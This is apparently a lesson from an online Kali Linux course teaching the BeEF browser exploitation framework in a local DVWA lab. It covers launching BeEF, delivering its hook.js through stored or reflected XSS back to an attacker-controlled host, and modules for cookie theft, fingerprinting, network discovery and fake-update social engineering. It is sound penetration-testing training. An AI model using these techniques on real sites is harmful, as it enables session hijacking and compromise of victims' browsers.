📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.
🗡️ KALI LINUX COURSE
FREE
Part of the 120-Day Kali Linux Mastery Course
Day 25 of 180 · 13.8% complete
⚠️ Authorised Lab Environments Only. BeEF-XSS sends command modules to hooked browsers. Every exercise in this lab targets your own DVWA instance or browsers you control. Never hook browsers you don’t own. Browser exploitation without authorisation is illegal everywhere.
ZAP found the XSS on Day 24. You confirmed it with alert(1). An alert box fired. Your CVSS score said Medium. Now I want to show you what that Medium actually means when you stop accepting the pop-up and start using the right tool. A pop-up is a proof of concept. BeEF turns the same XSS into a persistent command-and-control channel into the victim’s browser. Same vulnerability. Completely different impact. That’s the gap between what scanners report and what pentesters demonstrate — and it’s the gap Day 25 closes.
🎯 What You’ll Master in Day 25
Launch BeEF-XSS and understand the hooking architecture
Deliver the BeEF hook script via an XSS injection point
Run browser fingerprinting, network discovery, and social engineering modules
Understand the BeEF + Metasploit browser_autopwn chain
Write a professional escalated XSS finding for a pentest report
⏱️ 45 min read · 3 exercises · Day 25 of 120 #### ✅ Before You Start - Day 24: OWASP ZAP — automated scanning found the XSS. Today you take that XSS finding and escalate it from an alert() pop-up to full browser control using BeEF. - DVWA running at http://localhost/dvwa/ with security set to Low. BeEF is pre-installed in Kali — launch with beef-xss. Default credentials: beef/beef. ### 📋 Day 25 — BeEF-XSS Tutorial 1. BeEF Architecture — How the Hook Works 2. Launch BeEF and Deliver the Hook 3. Command Modules — What You Can Do to a Hooked Browser 4. Network Discovery via the Hooked Browser 5. BeEF + Metasploit — Browser Autopwn Chain 6. Reporting Escalated XSS After Day 24’s OWASP ZAP scanning surfaced the XSS findings, Day 25 is where I show you what those findings are really worth. BeEF is the tool that connects ZAP’s XSS alert to an actual browser control channel — and it’s the reason a stored XSS in a site with 10,000 daily users is Critical, not Medium. The full methodology is in the Kali Linux Mastery Course.
BeEF Architecture — How the Hook Works
BeEF (Browser Exploitation Framework) operates through a JavaScript hook — a single script tag that, when executed in a victim’s browser, establishes a persistent connection back to your BeEF server. The victim’s browser becomes a zombie: it polls BeEF every few seconds asking “any commands for me?” You respond through the BeEF web UI by selecting modules to execute.
BEEF ARCHITECTURE — QUICK REFERENCECopy
BeEF hook delivery — the XSS payload
hook.js loads in victim browser → calls home to BeEF C2 on port 3000
Communication flow
Victim browser → GET /hook.js → BeEF server (attacker Kali)
Victim browser ← module commands ← BeEF web UI (attacker)
Victim browser → module results → BeEF server → attacker sees data
What BeEF runs on
BeEF server: port 3000 — web UI + hook C2 on same port
Web UI: http://127.0.0.1:3000/ui/panel (beef/beef default)
Hook URL: http://KALI_IP:3000/hook.js
securityelites.com
BeEF Web UI — Hooked Browser Control Panel
HOOKED BROWSERS
● 192.168.56.1 (online)
Chrome 121 · Windows 10
Hooked: 2m 14s ago
COMMAND MODULES (selected)
✅ Browser > Get Cookie → Result: PHPSESSID=abc123; security=low
✅ Browser > Fingerprint → Chrome 121 / Win10 / 1920×1080
⏳ Network > Discovery → Scanning 192.168.56.0/24…
○ Social Eng > Fake Update → Ready
○ Metasploit > Browser Exp → Ready
📸 BeEF web UI showing a hooked browser. The left panel lists all connected (online) browsers — each one a victim whose browser loaded the hook.js. The right panel shows command module results: Get Cookie has returned the PHPSESSID session token, browser fingerprinting is complete, network discovery is running. From this single XSS injection, I now have the session cookie that grants admin access, the full browser/OS profile for exploit targeting, and a pivot point into the victim’s internal network. This is why stored XSS on an authenticated page is Critical, not Medium.
Launch BeEF and Deliver the Hook
LAUNCHING BEEF AND DELIVERING THE HOOKCopy
Launch BeEF (Kali pre-installed)
sudo beef-xss
Or: sudo /usr/share/beef-xss/beef
Output shows: Web UI at http://127.0.0.1:3000/ui/panel
Hook URL: http://YOUR_KALI_IP:3000/hook.js
Get your Kali IP (use this in the hook payload)
hostname -I | awk ‘{print $1}’
Hook delivery via stored XSS in DVWA (XSS Stored module)
Navigate to: http://localhost/dvwa/vulnerabilities/xss_s/
Name field: anything
Message field: your hook script
Submit → hook loads when anyone visits the guestbook page
Hook delivery via reflected XSS (URL parameter)
http://localhost/dvwa/vulnerabilities/xss_r/?name=
Verify hook in BeEF UI
Open browser → http://127.0.0.1:3000/ui/panel → beef/beef
Left panel: “Hooked Browsers” should show new entry within 3s
🧠 EXERCISE 1 — THINK LIKE A HACKER (15 MIN · NO TOOLS)
Design a BeEF Attack Chain — From XSS to Maximum Impact
⏱️ 15 minutes · No tools required
📖 Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites →
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)